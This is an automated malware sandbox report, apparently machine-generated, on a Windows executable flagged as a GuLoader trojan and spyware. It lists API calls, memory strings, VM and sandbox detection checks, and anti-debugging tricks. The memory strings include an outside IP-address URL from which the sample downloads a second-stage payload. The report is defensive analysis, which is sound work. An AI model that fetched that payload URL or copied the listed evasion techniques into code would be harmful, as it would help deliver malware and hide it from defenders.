                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_0040755C
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_00406D85
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_729B1BFF
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029AAA49
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A0FEB
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A77E0
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A9CFA
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A21DA
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A75CD
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A9E91
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A62BA
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A92DC
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A7AC8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A021A
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A964E
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6FD1
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A8B07
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A8F59
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A5F71
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6F63
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A8C81
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A7C17
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A680A
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A9002
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6832
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6987
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A95A7
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A697E
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000644F8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000609C0
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00064A30
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00069E50
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00062E75
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_0006E5C9
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00064D60
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000A612F
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000A6B00
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000AED60
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000A7170
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000A9728
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000A9808
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00105C58
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00107FB8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00102FE8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A77E0 NtAllocateVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A9CFA NtWriteVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029AA562 NtProtectVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A62BA NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A92DC NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A021A NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6FD1 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A8B07 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A8F59 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6F63 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A8C81 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A680A NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6832 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A6987 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A95A7 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A792B NtAllocateVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A697E NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Process Stats: CPU usage > 98%
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename_.dll4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp | Binary or memory string: OriginalFilename_.dll4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename_.dll4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe | Static PE information: invalid certificate
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | File read: C:\Users\user\Desktop\mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown | Process created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Process created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Process created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | File created: C:\Users\user\AppData\Local\Yandex
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | File created: C:\Users\user\AppData\Local\Temp\nsyE396.tmp
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_004021AA CoCreateInstance,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | File read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: mixfive_20211216-221155.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb | source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp

                        Data Obfuscation:

                        Yara detected GuLoader
                        Source: Yara match | File source: 0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.816118549.00000000029A0000.00000040.00000001.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_729B30C0 push eax; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A0FEB push cs; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A52B2 pushad ; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A2EAB push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A1AFC push edx; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A57BD push ecx; iretd
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A23DB push ecx; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A2FCD push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A37E9 push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A2311 push ecx; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A2F5D push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A5B71 pushad ; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A54BE push A139D881h; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A385B push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_029A2D1E push ds; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_00062A48 push esp; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_0006B530 push esp; iretd
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000AD4D0 push cs; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_000AF950 push eax; iretd
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 12_2_0010099C push 418B000Dh; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_729B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | File created: C:\Users\user\AppData\Local\Temp\nsiE423.tmp\System.dll
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        Tries to detect Any.run
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe File opened: C:\Program Files\qga\qga.exe
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://185.112.83.8/ALLOCATION.BIN
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe TID: 7060 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe TID: 6104 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A95BB rdtsc
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Window / User API: threadDelayed 472
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Window / User API: threadDelayed 762
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Window / User API: threadDelayed 2737
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_0040290B FindFirstFileW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe System information queried: ModuleInformation
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: vmicvss
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001607711.0000000000A04000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://185.112.83.8/Allocation.bin
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001581740.00000000009D8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW`
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

                        Anti Debugging:

                        Hides threads from debuggers
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Thread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_729B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A95BB rdtsc
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A9CFA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A7471 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A8C74 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A510D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A912F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_029A8362 LdrInitializeThunk,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Memory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Process created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
